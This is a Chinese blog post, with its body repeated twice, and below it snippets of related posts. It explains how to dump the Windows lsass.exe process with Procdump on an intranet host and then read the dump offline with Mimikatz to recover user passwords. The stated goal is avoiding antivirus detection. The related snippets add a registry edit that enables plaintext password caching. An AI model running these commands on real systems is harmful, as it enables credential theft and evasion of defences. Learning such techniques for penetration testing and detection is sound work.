procdump和mimikatz联动

最新推荐文章于 2024-04-24 22:33:04 发布
最新推荐文章于 2024-04-24 22:33:04 发布
阅读量832 收藏 2
点赞数
CC 4.0 BY-SA版权
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45715461/article/details/125538159
本文介绍如何通过在目标主机上传不可读的Procdump文件,结合本地Mimikatz工具,安全地获取lsass.dmp文件,从而在内网环境中避开杀毒软件,获取用户密码等敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Mimikatz属于第三方软件,直接上传到目标主机可能被杀毒软件查杀,这时我们可以配合官方软件Procdump,将Procdump上传目标主机获取用户信息(该文件不可读),使用本地的Mimikatz打开Procdump获取的用户信息。

  1. 上传Procdump到内网主机中,然后执行以下命令,获取到内存转储文件lsass.dmp文件
procdump -accepteula -ma lsass.exe lsass.dmp

image-20220630114927050

  1. 将生成的dmp文件移动到Mimikatz的机器中,运行以下命令,然后就能够首先在靶机上运行mimikatz一样的效果,并且还避免了mimikatz被杀的风险。
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

image-20220630115508553

Mimikatz属于第三方软件,直接上传到目标主机可能被杀毒软件查杀,这时我们可以配合官方软件Procdump,将Procdump上传目标主机获取用户信息(该文件不可读),使用本地的Mimikatz打开Procdump获取的用户信息。

  1. 上传Procdump到内网主机中,然后执行以下命令,获取到内存转储文件lsass.dmp文件
procdump -accepteula -ma lsass.exe lsass.dmp

image-20220630114927050

  1. 将生成的dmp文件移动到Mimikatz的机器中,运行以下命令,然后就能够首先在靶机上运行mimikatz一样的效果,并且还避免了mimikatz被杀的风险。
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

image-20220630115508553

Procdump+Mimikatz获取Windows明文密码
SheXinK’s Blog
11-10 2643
Procdump+Mimikatz获取Windows明文密码1 测试环境2 抓取密码 2.1 Server 2008 R2抓取  2.1.1 生成存储文件  2.1.2 mimiakatz密码获取 2.2 Server 2012 R2抓取  2.1.1 修改注册表  2.1.2 mimiakatz密码获取 1 测试环境  系统:   Server 2008 R2   Server 2012 R2 ...
ProcDump配合mimikatz获取Windows系统账户密码等信息
最新发布
CoffeMilk的博客
11-01 1173
简单的说就是Windows系统中关于账户密码等信息内容(无论是明文还是密文)都是由lsass.exe 进程管理的,我们可以使用微软自己开发的ProcDump进程监视器来备份一份Windows的lsass.exe账户管理进程,然后使用mimikatz来读取备份出来的信息。
利用procdump+Mimikatz绕过杀软获取Windows明文密码
大河之犬的博客
09-12 1004
Mimikatz是从lsass.exe中提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用ProcDump工具将系统的lsass.exe进程进行转储,导出dmp文件,拖回到本地后,在本地再利用Mimikatz进行读取。而ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。
procdump+mimikatz.zip
11-14
procdump+mimikatz
利用procdump+Mimikatz 绕过杀软获取Windows明文密码
热门推荐
冷风
09-30 2万+
Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载。但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可以有更好的办法,只需要在自己的电脑上运行Mimikatz alpha(地址)版本,然后处理dump的LSASS进程内存文件就行!那么如何dump LSASS进程内存呢。可以通过以下方式:1.对于NT6
利用procdump+mimikatz读取windows系统中的密码
LUOBIKUN的博客
09-07 4276
利用procdump+mimikatz读取windows系统中的密码 今天在学习的过程中,认识了一个工具,可以很简单的就读取windows系统的密码,觉得特别有趣,就自己亲自上手尝试了一下,果然很简单,就是因为比较笨,过程有点曲折,特此记录。 工具我也都整理好了, 链接:https://pan.baidu.com/s/1005cCJe-gJq_Q2vZ7M9lwg 提取码:b1q6 procdump,可以将lsass进程的内存文件导出来; mimikatz,可以对导出的内存文件进行分析,从而获取密码。 1,
利用Procdump+Mimikatz获取Windows帐户密码
cj_Hydra's Blog
01-29 1143
复现过程 导出lsass.exe 首先要获取到内存文件lsass.exe进程, 它用于本地安全登陆策略,一般在进程管理器中能看到,这里用到微软官方发布的工具Procdump导出lsass.exe,所以不存在被杀软拦截的情况: 上传文件procdump64.exe到可执行目录中,执行下面语句: procdump64.exe -accepteula -ma lsass.exe lsass.dmp ...
Procdump+mimikatz绕过安全防护读取密码
xxx9686的博客
09-16 424
在我们提权过程中经常会遇到杀毒软件,在我们将提权exp或者密码读取工具一上传至目标服务器立马被删的尴尬,本文完美解决此问题。Procdump是微软自家的外部工具,其主要目的是监视应用程序中的CPU尖峰并在尖峰期间生成崩溃转储。运行后将会保存lsass到本地,我们可以将该文件拖动到物理机中,使用mimikatz对其密码查看。使用procdump转储lsass进程。
利用procdumpmimikatz提升安全测试效率
在安全领域,ProcdumpMimikatz的结合使用,可以用于安全监控潜在的恶意行为检测。例如: - 利用Procdump在检测到异常CPU或内存使用时捕获内存转储,再通过分析这些转储文件来查找Mimikatz等恶意工具的痕迹。 - ...
mimikatz配合procdump抓取密码
qq_44881113的博客
09-16 4246
0x01 获取本地帐户密码 1.1 本地执行 下载mimikatz程序,找到自己系统对应的位数,右键以管理员身份运行: (不是管理员会报错) #提升权限 privilege::debug #抓取密码 sekurlsa::logonpasswords 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 cmd修改注册表命令: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProvider
procdump32_64+mimikatz.rar
06-15
procdump32_64 mimikatz,测试可以用,获取系统的密码信息。
ProcDump抓取dump的工具
12-30
ProcDump 是一个命令行的实用工具,其主要目的是监测应用程序如何使 CPU 达到峰值(spike)以及生成崩溃转储(crash dumps),管理员或开发人员可以利用这个工具确定造成 CPU 达到峰值的原因.至于怎么使用呢?请众看倌们点选这里看看详细的指令.
密码抓取--Prodump+Mimikatz抓取windows系统密码
网络安全。
02-13 1664
1、查看目标系统管理员登录情况,管理员在线,抓到明文密码的可能性更大。 query user 2、查看目标系统版本。 wmic OS get Caption,OSArchitecture 3、通过Procdump dump lsass.exe 进程数据并将其保存到 lsass.dmp 文件中。 procdump64.exe -accepteula -ma lsass.exe lsass.dmp...
Mimikatz + procdump 的使用
键盘上温暖而又美好的时光 .
11-15 7205
控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 ​​​​​​https://github.com/gentilkiwi/mimikatz/releases privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 mimikatz是从 lsass.exe进程中获取windows的账号及密码的, 这时,我们可以帮对方安装一个procdump64.exe(这是微软自己的工具,可以放心使用) 然后从 lsass.exe
内网渗透-Mimikatz+Procdump的使用
weixin_60830484的博客
04-24 862
在内网渗透中,获取目标明文密码是必不可少的一部分,可以扩大"攻击面",因此本文将讲解相关工具的使用以及原理。
使用Procdump+mimikatz抓取windows7明文密码
qq_40671478的博客
09-02 1622
首先打开mimikatz_trunk2.0 在DOS运行界面中输入privilege::debug提权命令1 我们提权成功后,我们再来输入sekurlsa::logonpasswords抓取密码命令 但是出现错误,如下图 网上搜索了一下,我决定使用procdump结合mimikatz实现免杀效果,procdump是微软的官方工具,不会被杀. 首先在任务管理器找到lsass.exe,右键创建转储文件 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值